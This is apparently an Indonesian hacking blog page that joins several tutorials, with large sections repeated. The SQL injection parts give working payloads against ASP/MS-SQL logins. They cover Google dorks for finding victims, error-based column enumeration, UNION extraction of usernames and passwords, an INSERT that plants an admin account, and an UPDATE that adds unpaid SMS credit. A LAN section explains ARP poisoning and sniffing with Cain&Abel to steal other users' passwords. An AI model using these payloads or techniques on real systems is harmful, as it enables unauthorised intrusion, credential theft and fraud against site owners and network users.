www.target.com/ login.asp >> contoh target
www.target.com/ login.asp? err=Invalid_ password >> persan error yang
dapat di eksploitasi seperti biasa kalau ingin cari n tes vuln
engganya tuh
situs kita ketikan ' having 1=1-- di input box atau URL error tadi ,
contoh : www.target.com/ login.asp? err=' having 1=1-- then,....
Microsoft OLE DB Provider for SQL Server (0x80040E14)
Column 'Users.UserID' is invalid in the select list because it is
not
contained in an
aggregate function and there is no GROUP BY clause
itu error messagesnya, kini kita group field UserID dari table
Users,
stringnya : ' group by UserID --
then,...
Microsoft OLE DB Provider for SQL Server (0x80040E14)
Column 'Users.ClientName' is invalid in the select list
because it is not contained in either an aggregate function or the
GROUP BY clause.
muncul lagi error seperti itu....lalu lagi kita Group. Kini
stringnya
adalah ' group by
field1,field2 --
contoh : ' group by UserID,ClientName --
then,...
Microsoft OLE DB Provider for SQL Server (0x80040E14)
Column 'Users.UserName' is invalid in the select list because it is
not
contained in
either an aggregate function or the GROUP BY clause.
trus group by lagi, hal ini kita lakukan (proses looping) sampai
semua
field kita
ketahui..... .makanya harus sabar, kalau engga ga bakal tembus :)
apabila sudah lama melakukan looping dan akhirnya ketika group
terakhir
kita lakukan dan tidak keluar error messagesnya maka error yang
terakhir adalah field yg terakhir.... .field table itu bisa panjang
sekali,
tergantung admin yang masangnya jadi susah kalau maen teabk2an
ajah....contoh field yang pernah gw temuin : ' group by
UserID,ClientName, UserName, Password, PhysicalAddress, PhoneNumber, Email
,
OperatingSystem, PrefferredGraphi cFormat
-- >> ada 9 field!!! jangan males dalam proses Looping :P
setelah dapet semua field, kini yang kita lakukan adalah mencari
siapa
aja user yang ada dalam table Users dan kolom UserName...
caranya? kita pake Union apa itu UNION??? union adalah perintah SQL
dimana ia dapat menggabungkan dua SELECT list tapi kalau pengen
gunain
Union ini kita harus tahu ada berapa field dalam table tadi
sintaksnya gini :
select field1, field2, … field_n
from tables
UNION
select field1, field2, … field_n
from tables;
nah biasanya dalam SQL QUERY di input box username itu mereka bikin
query select * from
Users where UserName =='"+login+" ' and Password='"+ pass"'"; nah
kalau
begitu kita masukin syntax sql union untuk melihat username : '
union
select min(UserName) ,1,1,1 from Users where username > 'a'--
jadi hasilnya : select * from Users where UserName ==' union select
min(UserName) ,1,1,1 from Users where username > 'a'--and
Password='"+ pass"'"; gitu kiranya, jadi nanti akan muncul error
messages lagi
yang akan menampilkan sebuah username lebih dari huruf a ,contoh:
Error Type:
Microsoft OLE DB Provider for SQL Server (0x80040E07)
Syntax error converting the varchar value 'Agile' to a column of
data
type int. /
tuh lihat kan ada user dengan nama Agile...lalu looping lagi pake
string union tadi nanti akan muncul username2 lain....lalu bagaimana
dengan
passwordnya? ??
ok union beraksi kembali : ' union select min
(UserName),1, 1,1,1,1,1, 1,1
from Users where username > 'Agile'--
lalu akan muncul error yang memberitahukan passwordnya, contoh :
Error Type:
Microsoft OLE DB Provider for SQL Server (0x80040E07)
Syntax error converting the varchar value 'Surfer' to a column of
data
type int. /
kalau dah gini kita bisa masuk dengan Username Agile dan passwordnya
Surfer...hehehe
selamat yah!
btw, kita juga ingin dong bisa INSERT databasenya. ....
caranya : karena ktia sudah tahu field2nya maka stringnya jadi : '
insert into table values
(field1,field2, ....,field_ n)--
misalkan ada field sebagai berikut :
'Users.UserID'
'Users. Username'
'Users.Password'
'Users.FName'
'Users.LName'
'Users.EmailAddress '
'Users.Administrato r'
itu berarti ada 7 field! Ok kita masukan menurut string tadi : '
insert
into Users values
(0,'lucifer' ,'lucifer' ,'lu','cid' ,'a@a.com',1)-- >> artinya kita
masukan id kita dalam
urutan 0, lalu username 'lucifer', password 'lucifer' Fname
(frontName)
itu 'lu',
Lname(LastName) sebagai 'cid', dan EmailAddress 'a@a.com'......
coba kita login dengan user buatan kita tadi....BINGO! selamat anda
berhasil menjebol
Hallo Semua? Apakabar? Sorry Sudah Lama Offline? ini ada sedikit cerpen tentang cara hack sebuah Website ,tapi jangan di gunakan untuk kejahatan ya
::PREFACE::
============ =
Setelah banyaknya bug-bug yang bertebaran di jagad maya ini dari
yang namanya Unicode (masih ada lho sekarang) , RPC DCOM, XSS, VP-
ASP, dan bug-bug e-commerce lainnya kini yang lagi "trend" dalam
teknik hacking adlaah SQL Injection. dalam vol. 1 ini gw jelasin
cara ngisi sesuatu dengan perintah UPDATE
::DESCRIPTION: :
===============
SQL adalah bahasa pemrograman database yang banyak dipakai dalam
website, laporan keuangan, data-data pekerjaan, data mahasiswa, dan
lain lain. Diantara jenis lainnya MS-SQL adalah yang paling
terkenal, nah ternyata semua hal yang di jagad maya ini adalah
Vulnerable terhadap berbagai serangan, jadi SQL pun menjadi target
dalam hal ini.
::VULN::
========
yang akan gw bahas disini adalah MS-SQL yang Link ODBC dengan bahasa
pemrograman website ASP.
::Injection: :
==========
ok, setelah basa basi diatas gw mulai neh ..hehehe
untuk menginject sql ini anda perlu memperhatikan input-inputan
dalam situs itu yang sekiranya connect dengan SQL database situs
itu, atau bisa juga dengan menambah dari link url di kotak browser
anda semisal : ....asp/productID= 1'[sql query/string. untuk mencari
target yang vuln seperti kondisi diatas anda perlu mencarinya
yang .asp nah seperti biasa....GOOGLING! !! hehehe
key wordnya di google adalah :
1. allinurl:.co. id/login. asp
2. allinurl:.com/ admin.asp
semuannya itu banyak kombinasinya lainnya itu tergantung seberapa
jauh anda kreatif dalam mencari target di google.nah, kanre disini
gw bahas cara inject ke situs web to sms so searchnya : asp,web to
sms atw Send SMS, ASP
ok, misal kita dapet target www.apes.com, nah lihat dah ada inputan
yang masuk ke database itu ga, misalnya search product, member
login, atw admin login :) setelah itu kita isa inject pake
sql "umum" stringnya : ' or 1=1-- disini kita lihat kalau 1=1 itu
nialinya true dan tanda -- itu adalah marknya SQL kalau di C++/C
itu // _/* jadi setelah tanda Mark perintah selanjutnya tidak
dijalankan. nah klo beruntung dapet /admin.asp kita inject seperti
diatas itu bisa lho kita masuk sebagai admin! ini terjadi di situs
berita nasional di indonesia...
nah, klo ga dapet dir adminya yah kita cari kotak input yang kiranya
connect ke database situs itu, contoh isa di login, member, search,
dll. kita masukan debugging codenya : ' having 1=1--
jreeeeeng... ..ini musti diinget n kudu di pake setiap klo mo inject,
kita injet di :
userid : ' having 1=1--
Password :fuzk3
lalu....jreeeeeeng. ...ERROR! !!!
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ ODBC SQL Server Driver][SQL Server]
Column 'UserDB.userid' is invalid in the select list because it is
not contained in an aggregate function and there is no GROUP BY
clause.
member/log_right. asp, line 25
tuh ketahuan ada kolom UserDB.userid, klo udah gini gemana lagi
dungs? ok kita loop lagi sekarang kita inject : ' group by
UserDB.userid -- atau ' group by UserDB.userid having 1=1-- disini
kita gunain perintah group by untuk menggroup kolom ingin kita
lihat....ehehe. ..muncul error lagi, kali ini beda choi...
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ ODBC SQL Server Driver][SQL Server]
Column 'UserDB.userpass' is invalid in the select list because it is
not contained in an aggregate function and there is no GROUP BY
clause.
member/log_right. asp, line 25
nah sekarang kita tau apa aja kolomnya...hehehe
penerapan selanjutanya adalah misal situs itu adalah situs
pengiriman SMS sedunia yang kalo kita membernya kita bisa send sms
dari web, namun harus ada account yang digunakan untuk mengirim sms
itu, jadi account itu harus ada nilainya dan untuk itu kita harus
mengisinya dengan cara membelinya.. .ok ok NO CARDING HERE!!!
heheheh...so gemana neh??? karena kita ini orang-orang kere hehehe
so kita inject aja....sebelumnya kita harus jadi member kan gratis
ini daftarnya...
setelah kita jadi member dengan id : fuzk3 dan pass: Vero...kita log
ke situs itu dengan id kita, cari tahu string khusus yang digunakan
web itu untuk menghitung account sms kita, misalnya : cell
nah, inilah injectnya... .cari login inputan lagi misal /member.asp
nah disitu ada input box id dan pass...kita Inject dengan :
' UPDATE [namadatabase] SET [charkhusus] = [nilai] WHERE [namakolom]
= '[char_id]'- -
contoh :
' UPDATE UserDb set cell=100 where userid ='fuzk3'-- (inget neh)
sep, nah klo muncul error : userid not found kita isa cari input di
forgot password : dengan inputan sama...jreeen ketika di jalankan ga
ada error apa-apa..kembali login lalu...jreeeeeenng. ..liha cell mu
itu waduh 100 cell enak neh sms seratus kali....kiekiekie. ..SUKSES
BRO!!! :)
atau cara ke 2
::PREFACE::.
============
Kalau di Vol.1 dah dibahas teknik UPDATE di MS-SQL maka disini gw
jelasin cara INSERT dan UNION......rada ngejelimet neh.....makanya
kalau
baca artikel ini harus ada aer putih hyuehueh.... N disini gw juga
akan
kasih kilas balik sedikit untuk yang baru nyoba2 :) n penjelasan
yang
lebih detail
.::BODY::.
============
Sebelumnya tolong apabila browser kalian pada pake IE setting dulu
browsernya agar bisa melihat errornya. Setting di Tools-Internet
option-Advanced tab-Show friendly HTTP error messages. itu musti
dilakukan, kalau
tidak kalian tidak bisa lihat error messages yg keluar nanti.
OK, masih inget kan cara cari targetnya? kalau lupa lihat lagi
artikel
Vol.1 :)
Nah, klo dah dapet targetnya sekarang tinggal input SQL Querynya di
input boxnya :
www.target.com/ login.asp >> contoh target
www.target.com/ login.asp? err=Invalid_ password >> persan error yang
dapat di eksploitasi seperti biasa kalau ingin cari n tes vuln
engganya tuh
situs kita ketikan ' having 1=1-- di input box atau URL error tadi ,
contoh : www.target.com/ login.asp? err=' having 1=1-- then,....
Microsoft OLE DB Provider for SQL Server (0x80040E14)
Column 'Users.UserID' is invalid in the select list because it is
not
contained in an
aggregate function and there is no GROUP BY clause
itu error messagesnya, kini kita group field UserID dari table
Users,
stringnya : ' group by UserID --
then,...
Microsoft OLE DB Provider for SQL Server (0x80040E14)
Column 'Users.ClientName' is invalid in the select list
because it is not contained in either an aggregate function or the
GROUP BY clause.
muncul lagi error seperti itu....lalu lagi kita Group. Kini
stringnya
adalah ' group by
field1,field2 --
contoh : ' group by UserID,ClientName --
then,...
Microsoft OLE DB Provider for SQL Server (0x80040E14)
Column 'Users.UserName' is invalid in the select list because it is
not
contained in
either an aggregate function or the GROUP BY clause.
trus group by lagi, hal ini kita lakukan (proses looping) sampai
semua
field kita
ketahui..... .makanya harus sabar, kalau engga ga bakal tembus :)
apabila sudah lama melakukan looping dan akhirnya ketika group
terakhir
kita lakukan dan tidak keluar error messagesnya maka error yang
terakhir adalah field yg terakhir.... .field table itu bisa panjang
sekali,
tergantung admin yang masangnya jadi susah kalau maen teabk2an
ajah....contoh field yang pernah gw temuin : ' group by
UserID,ClientName, UserName, Password, PhysicalAddress, PhoneNumber, Email
,
OperatingSystem, PrefferredGraphi cFormat
-- >> ada 9 field!!! jangan males dalam proses Looping :P
setelah dapet semua field, kini yang kita lakukan adalah mencari
siapa
aja user yang ada dalam table Users dan kolom UserName...
caranya? kita pake Union apa itu UNION??? union adalah perintah SQL
dimana ia dapat menggabungkan dua SELECT list tapi kalau pengen
gunain
Union ini kita harus tahu ada berapa field dalam table tadi
sintaksnya gini :
select field1, field2, … field_n
from tables
UNION
select field1, field2, … field_n
from tables;
nah biasanya dalam SQL QUERY di input box username itu mereka bikin
query select * from
Users where UserName =='"+login+" ' and Password='"+ pass"'"; nah
kalau
begitu kita masukin syntax sql union untuk melihat username : '
union
select min(UserName) ,1,1,1 from Users where username > 'a'--
jadi hasilnya : select * from Users where UserName ==' union select
min(UserName) ,1,1,1 from Users where username > 'a'--and
Password='"+ pass"'"; gitu kiranya, jadi nanti akan muncul error
messages lagi
yang akan menampilkan sebuah username lebih dari huruf a ,contoh:
Error Type:
Microsoft OLE DB Provider for SQL Server (0x80040E07)
Syntax error converting the varchar value 'Agile' to a column of
data
type int. /
tuh lihat kan ada user dengan nama Agile...lalu looping lagi pake
string union tadi nanti akan muncul username2 lain....lalu bagaimana
dengan
passwordnya? ??
ok union beraksi kembali : ' union select min
(UserName),1, 1,1,1,1,1, 1,1
from Users where username > 'Agile'--
lalu akan muncul error yang memberitahukan passwordnya, contoh :
Error Type:
Microsoft OLE DB Provider for SQL Server (0x80040E07)
Syntax error converting the varchar value 'Surfer' to a column of
data
type int. /
kalau dah gini kita bisa masuk dengan Username Agile dan passwordnya
Surfer...hehehe
selamat yah!
btw, kita juga ingin dong bisa INSERT databasenya. ....
caranya : karena ktia sudah tahu field2nya maka stringnya jadi : '
insert into table values
(field1,field2, ....,field_ n)--
misalkan ada field sebagai berikut :
'Users.UserID'
'Users. Username'
'Users.Password'
'Users.FName'
'Users.LName'
'Users.EmailAddress '
'Users.Administrato r'
itu berarti ada 7 field! Ok kita masukan menurut string tadi : '
insert
into Users values
(0,'lucifer' ,'lucifer' ,'lu','cid' ,'a@a.com',1)-- >> artinya kita
masukan id kita dalam
urutan 0, lalu username 'lucifer', password 'lucifer' Fname
(frontName)
itu 'lu',
Lname(LastName) sebagai 'cid', dan EmailAddress 'a@a.com'......
coba kita login dengan user buatan kita tadi....BINGO! selamat anda
berhasil menjebol
Basic LAN Hack
Cara hacking via LAN (untuk curi pass orang2 yang lagi browsing)
* Network Admin sebagian besar adalah orang IT yang specialist dalam membuat program, bukan dalam Network Security
* Bila dienkripsi bandwidth yang dibuthkan akan meningkat dan tentu inet yang sudah lemot ini akan semakin lemot dan akhirnya page error
* Harganya tidak murah untuk memperoleh yang terenkripsi
Perbedaan antara jaringan Hub dan Switch:
* Pada jaringan hub semua data yang mengalir di jaringan dapat dilihat/diambil oleh komputer manapun yang ada di jaringan asalakan komputer tersebut merequest data tersebut, kalo tidak direquest ya tidak akan datang.
* Pada jaringan switch hanya komputer yang melakukan pertukaran data yang dapat melihat data tersebut, komputer2 lain tidak berhak merequest data tersebut.
Masalahnya adalah harga dari router hub dan switch tidak berbeda jauh sehingga kebanyakan tempat sekarang sudah menggunakan metode switch yang menyulitkan untuk network hacking.
Hacking ini menggunakan teknik:
* Sniffing
* ARP Poison Routing
Kedua Teknik di atas tidak akan bisa dicegah oleh firewall apapun di komputer korban, dijamin.
Important Note: ARP Poison Routing dapat meyebabkan denial of service (dos) pada salah satu / semua komputer pada network anda
Kelebihan:
* Tidak akan terdeteksi oleh firewall tipe dan seri apapun karena kelemahannya terletak pada sistem jaringan bukan pada komputernya
* Bisa mencuri semua jenis login password yang melalui server HTTP
* Bisa mencuri semua login password orang yang ada di jaringan Hub selama program diaktifkan
* Untuk ARP Poisoning bisa digunakan untuk mencuri password di HTTPS
* Semua programnya free
Kekurangan:
* Untuk jaringan Switch harus di ARP poisoning 1 persatu dan bandwidth anda akan termakan banyak untuk hal itu (kalo inet super cepat ga masalah)
* Ketahuan / tidak oleh admin jaringan di luar tanggung jawab saya
Mulai dari sini anggap bahwa di network dalam kisah ini ada 3 komputer, yaitu:
* Komputer Korban
* Komputer Hacker
* Server
Perbedaan-perbedaan antara jaringan switch dan jaringan hub:
Langkah-langkah pertama:
1. Cek tipe jaringan anda, anda ada di jaringan switch / hub. Jika anda berada di jaringan hub bersyukurlah karena proses hacking anda akan jauh lebih mudah.
2. Download program-program yang dibutuhkan yaitu Wireshark dan Cain&Abel.
Code:
http://www.wireshark.org/download.html
http://www.oxid.it/cain.html
Cara Menggunakan WireShark:
* Jalankan program wireshark
* Tekan tombol Ctrl+k (klik capture lalu option)
* Pastikan isi pada Interfacenya adalah Ethernet Card anda yang menuju ke jaringan, bila bukan ganti dan pastikan pula bahwa “Capture packets in promiscuous modeEon
* Klik tombol start
* Klik tombol stop setelah anda merasa yakin bahwa ada password yang masuk selama anda menekan tombol start
* Anda bisa melihat semua jenis packet yang masuk dan keluar di jaringan (atau pada komputer anda saja jika network anda menggunakan Swtich
* Untuk menganalisis datanya klik kanan pada data yang ingin di analisis lalu klik “Follow TCP StreamEdan selamat menganalisis paketnya (saya tidak akan menjelaskan caranya karena saya tidak bisa )
* Yang jelas dari data itu pasti di dalamnya terdapat informasi2 yang dimasukkan korban ke website dan sebaliknya
Cara di atas hanya berlaku apabila jaringan anda adalah Hub bukan switch
Dari cara di atas anda dapat mengetahui bahwa jaringan anda adalah hub/switch dengan melihat pada kolom IP Source dan IP Destination. Bila pada setiap baris salah satu dari keduanya merupakan ip anda maka dapat dipastikan jaringan anda adalah jaringan switch, bila tidak ya berarti sebaliknya.
Cara Menggunakan Cain&Abel:
* Penggunaan program ini jauh lebih mudah dan simple daripada menggunakan wireshark, tetapi bila anda menginginkan semua packet yang sudah keluar dan masuk disarankan anda menggunakan program wireshark
* Buka program Cain anda
* Klik pada bagian configure
* Pada bagian “SnifferEpilih ethernet card yang akan anda gunakan
* Pada bagian “HTTP FieldsEanda harus menambahkan username fields dan password fields nya apabila yang anda inginkan tidak ada di daftar.
Sebagai contoh saya akan beritahukan bahwa kalo anda mau hack password Friendster anda harus menambahkan di username fields dan passworsd fields kata name, untuk yang lain anda bisa mencarinya dengan menekan klik kanan view source dan anda harus mencari variabel input dari login dan password website tersebut. Yang sudah ada di defaultnya rasanyan sudah cukup lengkap, anda dapat mencuri pass yang ada di klubmentari tanpa menambah apapun.
* Setelah itu apply settingannya dan klik ok
* Di menu utama terdapat 8 tab, dan yang akan dibahas hanya 1 tab yaitu tab “SnifferEkarena itu pilih lah tab tersebut dan jangan pindah2 dari tab tersebut untuk mencegah kebingungan anda sendiri
* Aktifkan Sniffer dengan cara klik tombol sniffer yang ada di atas tab2 tersebut, carilah tombol yang tulisannya “Start/Stop SnifferE
* Bila anda ada di jaringan hub saat ini anda sudah bisa mengetahui password yang masuk dengan cara klik tab (Kali ini tab yang ada di bawah bukan yang di tengah, yang ditengah sudah tidak usah diklik-klik lagi) “PasswordsE
* Anda tinggal memilih password dari koneksi mana yang ingin anda lihat akan sudah terdaftar di sana
* Bila anda ternyata ada di jaringan switch, ini membutuhkan perjuangan lebih, anda harus mengaktifkan APR yang tombolonya ada di sebelah kanan Sniffer (Dan ini tidak dijamin berhasil karena manage dari switch jauh lebih lengkap&secure dari hub)
* Sebelum diaktifkan pada tab sniffer yang bagian bawah pilih APR
* Akan terlihat 2 buah list yang masih kosong, klik list kosong bagian atas kemudian klik tombol EE(Bentuknya seperti itu) yang ada di jajaran tombol sniffer APR dll
* Akan ada 2 buah field yang berisi semua host yang ada di jaringan anda
* Hubungkan antara alamat ip korban dan alamat ip gateway server (untuk mengetahui alamat gateway server klik start pada komp anda pilih run ketik cmd lalu ketik ipconfig pada command prompt)
* Setelah itu baru aktifkan APR, dan semua data dari komp korban ke server dapat anda lihat dengan cara yang sama.
Anda dapat menjalankan kedua program di atas secara bersamaan (Cain untuk APR dan wireshark untuk packet sniffing) bila ingin hasil yang lebih maksimal.
Password yang bisa anda curi adalah password yang ada di server HTTP (server yang tidak terenkripsi), bila data tersebut ada di server yang terenkripsi maka anda harus mendekripsi data tersebut sebelum memperoleh passwordnya (dan itu akan membutuhkan langkah2 yang jauh lebih panjang dari cara hack ini)
* Network Admin sebagian besar adalah orang IT yang specialist dalam membuat program, bukan dalam Network Security
* Bila dienkripsi bandwidth yang dibuthkan akan meningkat dan tentu inet yang sudah lemot ini akan semakin lemot dan akhirnya page error
* Harganya tidak murah untuk memperoleh yang terenkripsi
Perbedaan antara jaringan Hub dan Switch:
* Pada jaringan hub semua data yang mengalir di jaringan dapat dilihat/diambil oleh komputer manapun yang ada di jaringan asalakan komputer tersebut merequest data tersebut, kalo tidak direquest ya tidak akan datang.
* Pada jaringan switch hanya komputer yang melakukan pertukaran data yang dapat melihat data tersebut, komputer2 lain tidak berhak merequest data tersebut.
Masalahnya adalah harga dari router hub dan switch tidak berbeda jauh sehingga kebanyakan tempat sekarang sudah menggunakan metode switch yang menyulitkan untuk network hacking.
Hacking ini menggunakan teknik:
* Sniffing
* ARP Poison Routing
Kedua Teknik di atas tidak akan bisa dicegah oleh firewall apapun di komputer korban, dijamin.
Important Note: ARP Poison Routing dapat meyebabkan denial of service (dos) pada salah satu / semua komputer pada network anda
Kelebihan:
* Tidak akan terdeteksi oleh firewall tipe dan seri apapun karena kelemahannya terletak pada sistem jaringan bukan pada komputernya
* Bisa mencuri semua jenis login password yang melalui server HTTP
* Bisa mencuri semua login password orang yang ada di jaringan Hub selama program diaktifkan
* Untuk ARP Poisoning bisa digunakan untuk mencuri password di HTTPS
* Semua programnya free
Kekurangan:
* Untuk jaringan Switch harus di ARP poisoning 1 persatu dan bandwidth anda akan termakan banyak untuk hal itu (kalo inet super cepat ga masalah)
* Ketahuan / tidak oleh admin jaringan di luar tanggung jawab saya
Mulai dari sini anggap bahwa di network dalam kisah ini ada 3 komputer, yaitu:
* Komputer Korban
* Komputer Hacker
* Server
Perbedaan-perbedaan antara jaringan switch dan jaringan hub:
Langkah-langkah pertama:
1. Cek tipe jaringan anda, anda ada di jaringan switch / hub. Jika anda berada di jaringan hub bersyukurlah karena proses hacking anda akan jauh lebih mudah.
2. Download program-program yang dibutuhkan yaitu Wireshark dan Cain&Abel.
Code:
http://www.wireshark.org/download.html
http://www.oxid.it/cain.html
Cara Menggunakan WireShark:
* Jalankan program wireshark
* Tekan tombol Ctrl+k (klik capture lalu option)
* Pastikan isi pada Interfacenya adalah Ethernet Card anda yang menuju ke jaringan, bila bukan ganti dan pastikan pula bahwa “Capture packets in promiscuous modeEon
* Klik tombol start
* Klik tombol stop setelah anda merasa yakin bahwa ada password yang masuk selama anda menekan tombol start
* Anda bisa melihat semua jenis packet yang masuk dan keluar di jaringan (atau pada komputer anda saja jika network anda menggunakan Swtich
* Untuk menganalisis datanya klik kanan pada data yang ingin di analisis lalu klik “Follow TCP StreamEdan selamat menganalisis paketnya (saya tidak akan menjelaskan caranya karena saya tidak bisa )
* Yang jelas dari data itu pasti di dalamnya terdapat informasi2 yang dimasukkan korban ke website dan sebaliknya
Cara di atas hanya berlaku apabila jaringan anda adalah Hub bukan switch
Dari cara di atas anda dapat mengetahui bahwa jaringan anda adalah hub/switch dengan melihat pada kolom IP Source dan IP Destination. Bila pada setiap baris salah satu dari keduanya merupakan ip anda maka dapat dipastikan jaringan anda adalah jaringan switch, bila tidak ya berarti sebaliknya.
Cara Menggunakan Cain&Abel:
* Penggunaan program ini jauh lebih mudah dan simple daripada menggunakan wireshark, tetapi bila anda menginginkan semua packet yang sudah keluar dan masuk disarankan anda menggunakan program wireshark
* Buka program Cain anda
* Klik pada bagian configure
* Pada bagian “SnifferEpilih ethernet card yang akan anda gunakan
* Pada bagian “HTTP FieldsEanda harus menambahkan username fields dan password fields nya apabila yang anda inginkan tidak ada di daftar.
Sebagai contoh saya akan beritahukan bahwa kalo anda mau hack password Friendster anda harus menambahkan di username fields dan passworsd fields kata name, untuk yang lain anda bisa mencarinya dengan menekan klik kanan view source dan anda harus mencari variabel input dari login dan password website tersebut. Yang sudah ada di defaultnya rasanyan sudah cukup lengkap, anda dapat mencuri pass yang ada di klubmentari tanpa menambah apapun.
* Setelah itu apply settingannya dan klik ok
* Di menu utama terdapat 8 tab, dan yang akan dibahas hanya 1 tab yaitu tab “SnifferEkarena itu pilih lah tab tersebut dan jangan pindah2 dari tab tersebut untuk mencegah kebingungan anda sendiri
* Aktifkan Sniffer dengan cara klik tombol sniffer yang ada di atas tab2 tersebut, carilah tombol yang tulisannya “Start/Stop SnifferE
* Bila anda ada di jaringan hub saat ini anda sudah bisa mengetahui password yang masuk dengan cara klik tab (Kali ini tab yang ada di bawah bukan yang di tengah, yang ditengah sudah tidak usah diklik-klik lagi) “PasswordsE
* Anda tinggal memilih password dari koneksi mana yang ingin anda lihat akan sudah terdaftar di sana
* Bila anda ternyata ada di jaringan switch, ini membutuhkan perjuangan lebih, anda harus mengaktifkan APR yang tombolonya ada di sebelah kanan Sniffer (Dan ini tidak dijamin berhasil karena manage dari switch jauh lebih lengkap&secure dari hub)
* Sebelum diaktifkan pada tab sniffer yang bagian bawah pilih APR
* Akan terlihat 2 buah list yang masih kosong, klik list kosong bagian atas kemudian klik tombol EE(Bentuknya seperti itu) yang ada di jajaran tombol sniffer APR dll
* Akan ada 2 buah field yang berisi semua host yang ada di jaringan anda
* Hubungkan antara alamat ip korban dan alamat ip gateway server (untuk mengetahui alamat gateway server klik start pada komp anda pilih run ketik cmd lalu ketik ipconfig pada command prompt)
* Setelah itu baru aktifkan APR, dan semua data dari komp korban ke server dapat anda lihat dengan cara yang sama.
Anda dapat menjalankan kedua program di atas secara bersamaan (Cain untuk APR dan wireshark untuk packet sniffing) bila ingin hasil yang lebih maksimal.
Password yang bisa anda curi adalah password yang ada di server HTTP (server yang tidak terenkripsi), bila data tersebut ada di server yang terenkripsi maka anda harus mendekripsi data tersebut sebelum memperoleh passwordnya (dan itu akan membutuhkan langkah2 yang jauh lebih panjang dari cara hack ini)
Langganan:
Postingan (Atom)